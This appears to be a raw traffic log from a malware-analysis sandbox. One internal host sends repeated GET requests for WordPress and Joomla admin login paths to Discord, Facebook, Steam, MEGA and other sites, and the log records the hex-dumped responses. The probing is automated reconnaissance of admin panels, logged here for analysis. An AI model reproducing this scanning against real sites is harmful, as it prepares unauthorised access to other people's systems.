Session ID | Source IP | Source Port | Destination IP | Destination Port
137 | 192.168.2.6 | 63379 | 162.159.135.232 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 322 | OUT | GET /wp-login.php HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 498 | IN | HTTP/1.1 404 OK
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Ray: 850abd5c1a3b452f-ATL
CF-Cache-Status: HIT
Accept-Ranges: bytes
Cache-Control: no-cache
Last-Modified: Fri, 26 Jan 2024 19:46:37 GMT
Set-Cookie: __dcfduid=f7108150c41711eea0b60fe64c998bd4; Expires=Sat, 03 Feb 2029 11:16:10 GMT; Max-Age=157680000; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2024-02-05 11:16:10 UTC | 2139 | IN | Data Ascii: Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'nonce-MTIwLDk0LDE0MywxMjIsOTcsMTMwLDE5OSwxNTA=' https://discord.com https://www.googletagmanager.com https://connect.facebook.net https://www.google-analytics.com https://ssl.
2024-02-05 11:16:10 UTC | 379 | IN | Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gn8CzNBWZiYj1lSlxBqNgKY6nsg1u%2F9%2B9d1%2Fb5pPYcFh08UCsRt%2BKE64ZJb%2BSGuEQVP%2Bdtdp186U9ZOyKc%2F7D5cLsB%2FOE%2BHIHz6I8SL21ImOz4LVmm3VwSI1gnq7"}],"group":"cf-nel","max_age":6048
2024-02-05 11:16:10 UTC | 1369 | IN | Data Ascii: 7ff2<!DOCTYPE html><html lang="en-US"><head> <meta charset="utf-8" /> <meta name="google-site-verification" content="nubQ83kz2YYRrleJaYf_CYbvDZ6lXVl-NL_MWX1Uj9Y" /> <meta name="msvalidate.01" content="330DC90484A4B7B61B36AD65E89B47AE" /> <meta
2024-02-05 11:16:10 UTC | 1369 | IN | Data Ascii: react-helmet="true">Page Not Found | Discord</title> ... endsection --><meta data-react-helmet="true" charset="utf-8"/><meta data-react-helmet="true" property="og:title" content="Page Not Found | Discord"/><meta data-react-helmet="true" property="og:ima
2024-02-05 11:16:10 UTC | 1369 | IN | Data Ascii: GI0g9O-54_SitcgmxQKxlA&gtm_preview=env-2&gtm_cookies_win=x'; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayer', 'GTM-N7BVC2W'); </script> ... endsection --></head><body> ... section:gtmNoScript--> <noscript>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 38 33 20 32 34 2e 38 30 38 20 36 2e 39 33 35 38 37 20 32 34 2e 33 31 32 43 37 2e 31 35 32 38 36 20 32 34 2e 31 35 37 31 20 37 2e 33 36 39 38 36 20 32 33 2e 39 38 36 36 20 37 2e 35 37 31 33 35 20 32 33 2e 38 31 36 31 43 31 32 2e 36 32 34 31 20 32 36 2e 31 32 35 35 20 31 38 2e 30 39 36 39 20 32 36 2e 31 32 35 35 20 32 33 2e 30 38 37 36 20 32 33 2e 38 31 36 31 43 32 33 2e 33 30 34 36 20 32 33 2e 39 38 36 36 20 32 33 2e 35 30 36 31 20 32 34 2e 31 35 37 31 20 32 33 2e 37 32 33 31 20 32 34 2e 33 31 32 43 32 32 2e 38 38 36 31 20 32 34 2e 38 30 38 20 32 32 2e 30 31 38 32 20 32 35 2e 32 32 36 35 20 32 31 2e 31 30 33 37 20 32 35 2e 35 36 37 35 43 32 31 2e 35 38 34 32 20 32 36 2e 35 31 32 39 20 32 32 2e 31 34 32 32 20 32 37 2e 34 31 31 39 20 32 32 2e 37 36 32 31 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 83 24.808 6.93587 24.312C7.15286 24.1571 7.36986 23.9866 7.57135 23.8161C12.6241 26.1255 18.0969 26.1255 23.0876 23.8161C23.3046 23.9866 23.5061 24.1571 23.7231 24.312C22.8861 24.808 22.0182 25.2265 21.1037 25.5675C21.5842 26.5129 22.1422 27.4119 22.7621
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 36 32 20 32 31 2e 36 37 37 34 43 36 34 2e 35 32 31 37 20 32 31 2e 34 34 34 39 20 36 33 2e 37 30 30 33 20 32 31 2e 31 30 33 39 20 36 32 2e 39 37 31 38 20 32 30 2e 36 33 38 39 56 31 37 2e 38 33 33 35 43 36 33 2e 35 32 39 38 20 31 38 2e 32 36 37 35 20 36 34 2e 32 35 38 32 20 31 38 2e 36 30 38 35 20 36 35 2e 31 38 38 32 20 31 38 2e 38 38 37 35 43 36 36 2e 31 31 38 31 20 31 39 2e 31 36 36 35 20 36 37 2e 30 31 37 31 20 31 39 2e 33 30 36 20 36 37 2e 38 38 35 31 20 31 39 2e 33 30 36 43 36 38 2e 32 38 38 20 31 39 2e 33 30 36 20 36 38 2e 35 39 38 20 31 39 2e 32 35 39 35 20 36 38 2e 37 39 39 35 20 31 39 2e 31 35 31 43 36 39 2e 30 30 31 20 31 39 2e 30 34 32 35 20 36 39 2e 31 30 39 35 20 31 38 2e 39 31 38 35 20 36 39 2e 31 30 39 35 20 31 38 2e 37 36 33 35 43 36 39 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 62 21.6774C64.5217 21.4449 63.7003 21.1039 62.9718 20.6389V17.8335C63.5298 18.2675 64.2582 18.6085 65.1882 18.8875C66.1181 19.1665 67.0171 19.306 67.8851 19.306C68.288 19.306 68.598 19.2595 68.7995 19.151C69.001 19.0425 69.1095 18.9185 69.1095 18.7635C69.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 37 43 37 35 2e 39 34 36 32 20 31 33 2e 31 33 37 37 20 37 36 2e 36 39 30 31 20 31 32 2e 35 31 37 37 20 37 37 2e 36 36 36 36 20 31 32 2e 30 35 32 38 43 37 38 2e 36 34 33 20 31 31 2e 36 30 33 33 20 37 39 2e 38 32 31 20 31 31 2e 33 37 30 38 20 38 31 2e 31 38 34 39 20 31 31 2e 33 37 30 38 43 38 32 2e 38 37 34 33 20 31 31 2e 33 37 30 38 20 38 34 2e 32 36 39 33 20 31 31 2e 37 32 37 33 20 38 35 2e 33 38 35 32 20 31 32 2e 34 34 30 32 56 31 35 2e 35 32 34 36 43 38 34 2e 39 39 37 37 20 31 35 2e 32 36 31 31 20 38 34 2e 35 33 32 38 20 31 35 2e 30 32 38 36 20 38 34 2e 30 30 35 38 20 31 34 2e 38 37 33 36 43 38 33 2e 34 37 38 38 20 31 34 2e 37 30 33 31 20 38 32 2e 39 32 30 38 20 31 34 2e 36 32 35 36 20 38 32 2e 33 33 31 39 20 31 34 2e 36 32 35 36 43 38 31 2e 32 37 37 39
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7C75.9462 13.1377 76.6901 12.5177 77.6666 12.0528C78.643 11.6033 79.821 11.3708 81.1849 11.3708C82.8743 11.3708 84.2693 11.7273 85.3852 12.4402V15.5246C84.9977 15.2611 84.5328 15.0286 84.0058 14.8736C83.4788 14.7031 82.9208 14.6256 82.3319 14.6256C81.2779
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 39 34 20 31 34 2e 34 38 36 31 20 39 33 2e 32 36 31 39 20 31 34 2e 34 38 36 31 43 39 32 2e 35 33 33 35 20 31 34 2e 34 38 36 31 20 39 31 2e 39 37 33 39 20 31 34 2e 36 38 37 36 20 39 31 2e 35 35 35 35 20 31 35 2e 30 39 30 36 43 39 31 2e 31 35 32 35 20 31 35 2e 34 39 33 36 20 39 30 2e 39 33 35 35 20 31 36 2e 30 32 30 36 20 39 30 2e 39 33 35 35 20 31 36 2e 37 30 32 35 43 39 30 2e 39 33 35 35 20 31 37 2e 33 38 34 35 20 39 31 2e 31 33 37 20 31 37 2e 39 32 37 20 39 31 2e 35 35 35 35 20 31 38 2e 33 32 39 39 43 39 31 2e 39 37 33 39 20 31 38 2e 37 34 38 34 20 39 32 2e 35 33 33 35 20 31 38 2e 39 34 39 39 20 39 33 2e 32 36 31 39 20 31 38 2e 39 34 39 39 43 39 33 2e 39 35 39 34 20 31 38 2e 39 33 34 34 20 39 34 2e 35 33 32 39 20 31 38 2e 37 33 32 39 20 39 34 2e 39 33 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 94 14.4861 93.2619 14.4861C92.5335 14.4861 91.9739 14.6876 91.5555 15.0906C91.1525 15.4936 90.9355 16.0206 90.9355 16.7025C90.9355 17.3845 91.137 17.927 91.5555 18.3299C91.9739 18.7484 92.5335 18.9499 93.2619 18.9499C93.9594 18.9344 94.5329 18.7329 94.935
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 37 30 31 38 43 31 31 35 2e 32 38 38 20 31 37 2e 33 35 32 37 20 31 31 35 2e 34 38 39 20 31 37 2e 38 36 34 32 20 31 31 35 2e 39 30 38 20 31 38 2e 32 36 37 32 43 31 31 36 2e 33 32 36 20 31 38 2e 36 37 30 32 20 31 31 36 2e 38 36 39 20 31 38 2e 38 37 31 37 20 31 31 37 2e 35 36 36 20 31 38 2e 38 37 31 37 43 31 31 38 2e 32 36 35 20 31 38 2e 38 37 31 37 20 31 31 38 2e 38 32 33 20 31 38 2e 36 37 30 32 20 31 31 39 2e 32 34 32 20 31 38 2e 32 35 31 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 38 2e 39 38 38 35 20 31 32 2e 34 30 39 31 43 36 30 2e 31 37 37 32 20 31 32 2e 34 30 39 31 20 36 31 2e 31 34 32 39 20 31 31 2e 35 34 31 36 20 36 31 2e 31 34 32 39 20 31 30 2e 34 37 31 37 43 36 31 2e 31 34 32 39 20 39 2e 34 30 31 36 34 20 36 30 2e 31 37 37 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7018C115.288 17.3527 115.489 17.8642 115.908 18.2672C116.326 18.6702 116.869 18.8717 117.566 18.8717C118.265 18.8717 118.823 18.6702 119.242 18.2517Z"></path><path d="M58.9885 12.4091C60.1772 12.4091 61.1429 11.5416 61.1429 10.4717C61.1429 9.40164 60.1772


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.6 | 63161 | 31.13.65.1 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /wp-login.php HTTP/1.1
Host: hi-in.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 654 | IN | HTTP/1.1 302 Found
Set-Cookie: ps_l=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=Lax
Set-Cookie: ps_n=0; expires=Tue, 11-Mar-2025 11:16:10 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
Location: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 0b4iEZNvRkcMksQR3rhVwdrOw9iIiV0G/qniENiEauQK1WF1domFrJm4vbIXvdSH0c+CZFhatV8uRoP3U0GFmg==
Date: Mon, 05 Feb 2024 11:16:10 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
139 | 192.168.2.6 | 63025 | 23.4.32.216 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 191 | OUT | GET /administrator/index.php HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 202 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://steamcommunity.com
Content-Length: 0
Date: Mon, 05 Feb 2024 11:16:10 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.6 | 64098 | 31.216.144.5 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 195 | OUT | GET / HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://mega.nz/wp-login.php
2024-02-05 11:16:10 UTC | 969 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Length: 2689
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Set-Cookie: geoip=RO
Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC2689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4d 45 47 41 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 45 47 41 20 70 72 6f 76 69 64 65 73 20 66 72 65 65 20 63 6c 6f 75 64 20 73 74 6f 72 61 67 65 20 77 69 74 68 20 63 6f 6e 76 65 6e 69 65 6e 74 20 61 6e 64 20 70 6f 77 65 72 66 75 6c 20 61 6c 77 61 79 73 2d 6f 6e 20 70 72 69 76 61 63 79 2e 20 43 6c 61 69 6d 20 79 6f 75 72 20 66 72 65 65 20 32 30 47 42 20 6e 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.6 | 63933 | 185.78.166.130 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 219 | OUT | GET /administrator/index.php HTTP/1.1
Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 359 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=413g84ktdejm8mm0c1531m1bv7; path=/
2024-02-05 11:16:10 UTC | 16025 | IN | Data Ascii: 1d0f<!DOCTYPE html><html lang="th"><head> ... Start Meta --> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="ahrefs-site-verification" content="3fbfe1a999442d746bef0aab7d579a75f597436b7fbba7bc96
2024-02-05 11:16:10 UTC | 11835 | IN | Data Ascii: <span style="font-size: 22px; color: green; font-style: italic"> 30 </span> - 31 2563 </p> --> </div>


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.6 | 63457 | 104.18.32.109 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 339 | OUT | GET /admin/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 1181 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12972
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 850abd5c3f561d62-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:10 UTC | 188 | IN | Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edg
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 69 74 69 61 6c 3b 63 6c 65 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: er .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clea
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 73 70 6f 72 74 2e 61 75 74 6f 70 6c 61 79 2e 63 6c 6f 75 64 22 2c 63 54 79 70 65 3a 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 30 34 35 31 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 35 63 33 66 35 36 31 64 36 32 27 2c 63 48 61 73 68 3a 20 27 39 63 31 34 31 31 61 63 33 30 65 33 62 34 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 61 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 2e 4f 47 32 7a 58 5a 5f 6b 77 44 45 35 37 4f 73 67 30 35 32 71 4a 69 34 4c 65 72 47 72 39 6e 69 38
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "sport.autoplay.cloud",cType: 'interactive',cNounce: '90451',cRay: '850abd5c3f561d62',cHash: '9c1411ac30e3b44',cUPMDTk: "\/admin\/?__cf_chl_tk=.OG2zXZ_kwDE57Osg052qJi4LerGr9ni8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 63 58 4f 61 4f 62 74 46 57 6c 4d 47 66 38 4b 2d 34 65 6f 4b 63 63 4f 49 48 74 6b 33 6a 69 47 36 43 52 35 4b 55 70 51 6a 41 7a 54 4d 37 34 39 50 2d 55 5f 6a 59 4f 4d 36 4f 35 6c 58 4e 51 4d 6b 45 61 4d 31 4b 4b 4a 68 5a 58 6c 68 34 37 53 63 61 6a 6f 59 2d 77 5f 57 6a 6b 4a 68 48 67 63 36 4a 37 4c 65 53 46 6c 37 4e 42 32 47 4d 43 4e 57 72 75 34 45 43 51 52 77 5a 67 64 4c 69 7a 30 65 6a 46 78 56 75 75 7a 79 49 39 6f 4f 53 36 4a 65 4d 52 54 30 6b 32 39 48 36 4b 52 65 30 57 6b 65 48 4c 71 4b 66 48 57 41 4a 43 31 50 4a 58 49 41 4f 48 70 71 4a 67 5f 62 70 6e 67 52 68 5f 65 64 35 65 44 53 35 67 53 73 76 48 6b 66 70 72 74 7a 70 4a 6d 4c 44 62 56 4f 44 70 6a 79 36 75 4b 76 6a 64 54 6c 4a 54 49 57 49 76 6e 30 67 47 6c 4d 72 7a 6c 52 5a 2d 45 44 56 35 74 7a 4f 76 58
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cXOaObtFWlMGf8K-4eoKccOIHtk3jiG6CR5KUpQjAzTM749P-U_jYOM6O5lXNQMkEaM1KKJhZXlh47ScajoY-w_WjkJhHgc6J7LeSFl7NB2GMCNWru4ECQRwZgdLiz0ejFxVuuzyI9oOS6JeMRT0k29H6KRe0WkeHLqKfHWAJC1PJXIAOHpqJg_bpngRh_ed5eDS5gSsvHkfprtzpJmLDbVODpjy6uKvjdTlJTIWIvn0gGlMrzlRZ-EDV5tzOvX
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 45 61 58 51 36 67 4e 32 59 67 4f 69 42 51 79 48 62 6d 5a 4a 43 46 45 6b 61 6d 64 69 76 79 4a 41 73 48 44 79 64 57 53 61 51 70 64 72 6c 79 32 74 75 2d 47 57 38 4e 53 78 63 4b 30 6d 58 75 35 4f 74 47 79 32 78 69 55 5f 4c 54 77 71 53 43 6b 61 2d 50 36 48 57 4b 67 73 37 61 4f 4b 76 34 45 62 4f 50 46 73 38 4c 32 46 6b 49 51 61 30 54 39 58 76 31 56 59 46 5f 67 36 77 31 58 45 52 79 66 71 39 77 39 58 6e 72 44 2d 30 31 50 61 30 4e 48 53 6a 64 5a 68 79 79 77 67 45 67 49 45 52 36 36 75 79 45 4b 47 43 57 5a 54 6d 57 44 6c 52 6e 35 62 67 41 70 4a 68 44 46 68 78 51 6c 43 53 49 47 64 2d 61 6b 45 34 6e 78 64 4e 42 66 76 78 79 7a 44 48 4e 70 79 6f 34 67 48 74 43 39 5a 6e 4b 4c 68 74 6e 55 33 53 65 38 39 47 47 38 50 4a 68 34 50 36 79 4a 50 6e 58 5f 7a 6b 59 50 53 56 6b 33
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: EaXQ6gN2YgOiBQyHbmZJCFEkamdivyJAsHDydWSaQpdrly2tu-GW8NSxcK0mXu5OtGy2xiU_LTwqSCka-P6HWKgs7aOKv4EbOPFs8L2FkIQa0T9Xv1VYF_g6w1XERyfq9w9XnrD-01Pa0NHSjdZhyywgEgIER66uyEKGCWZTmWDlRn5bgApJhDFhxQlCSIGd-akE4nxdNBfvxyzDHNpyo4gHtC9ZnKLhtnU3Se89GG8PJh4P6yJPnX_zkYPSVk3
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 4c 6a 41 3d 27 2c 72 6d 3a 20 27 52 30 56 55 27 2c 64 3a 20 27 6f 7a 4a 6c 42 71 77 32 72 36 50 6f 31 61 76 4f 5a 34 32 49 37 55 50 48 6c 44 4c 43 6f 32 75 71 57 44 6e 66 4c 32 38 4a 50 7a 2f 6b 63 77 42 65 49 4d 53 73 57 50 61 38 2f 67 4a 6b 31 44 30 71 55 6f 37 6f 62 76 52 57 6b 33 38 59 42 74 55 74 50 6d 76 37 32 54 4a 54 4e 48 45 47 6a 75 67 72 68 72 72 59 37 38 61 58 59 69 59 72 32 4a 70 76 6a 69 4d 75 70 53 39 51 38 4f 2f 46 46 62 75 30 68 68 52 57 79 43 50 39 52 75 67 53 43 53 48 66 34 45 39 43 4e 49 38 4c 35 2b 4d 4f 56 31 73 76 5a 52 59 69 6a 55 56 7a 6f 35 51 79 42 56 70 67 41 50 59 63 57 71 6e 77 4d 62 46 37 73 59 34 67 67 2f 38 4d 58 6a 47 33 34 66 36 57 70 2b 7a 35 75 65 4e 6c 4d 52 53 6b 77 4c 4e 50 51 30 77 44 70 4e 4c 61 78 4e 58 37 73 77
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: LjA=',rm: 'R0VU',d: 'ozJlBqw2r6Po1avOZ42I7UPHlDLCo2uqWDnfL28JPz/kcwBeIMSsWPa8/gJk1D0qUo7obvRWk38YBtUtPmv72TJTNHEGjugrhrrY78aXYiYr2JpvjiMupS9Q8O/FFbu0hhRWyCP9RugSCSHf4E9CNI8L5+MOV1svZRYijUVzo5QyBVpgAPYcWqnwMbF7sY4gg/8MXjG34f6Wp+z5ueNlMRSkwLNPQ0wDpNLaxNX7sw


Session ID  Source IP    Source Port  Destination IP  Destination Port
143         192.168.2.6  63458        36.255.71.45    443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  188                OUT        GET /administrator/index.php HTTP/1.1
                                                       Host: instructory.net
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC  204                IN         HTTP/1.1 404 Not Found
                                                       server: nginx/1.18.0 (Ubuntu)
                                                       date: Mon, 05 Feb 2024 11:16:10 GMT
                                                       content-type: text/html; charset=UTF-8
                                                       transfer-encoding: chunked
                                                       vary: Accept-Encoding
                                                       connection: close
2024-02-05 11:16:10 UTC  27                 IN         Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                       Data Ascii: 10File not found.0


Session ID  Source IP    Source Port  Destination IP  Destination Port
144         192.168.2.6  63291        31.13.88.1      443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  191                OUT        GET /administrator/index.php HTTP/1.1
                                                       Host: th-th.facebook.com
                                                       Accept: */*
                                                       Accept-Encoding: deflate, gzip
                                                       User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC  693                IN         HTTP/1.1 404 Not Found
                                                       Vary: Accept-Encoding
                                                       Set-Cookie: fr=0RMlcudAnFvKbatpJ..BlwMN6.Hq.AAA.0.0.BlwMN6.AWWgnHCw83c; expires=Sun, 05-May-2024 11:16:10 GMT; Max-Age=7776000; path=/; domain=.facebook.com; secure; httponly
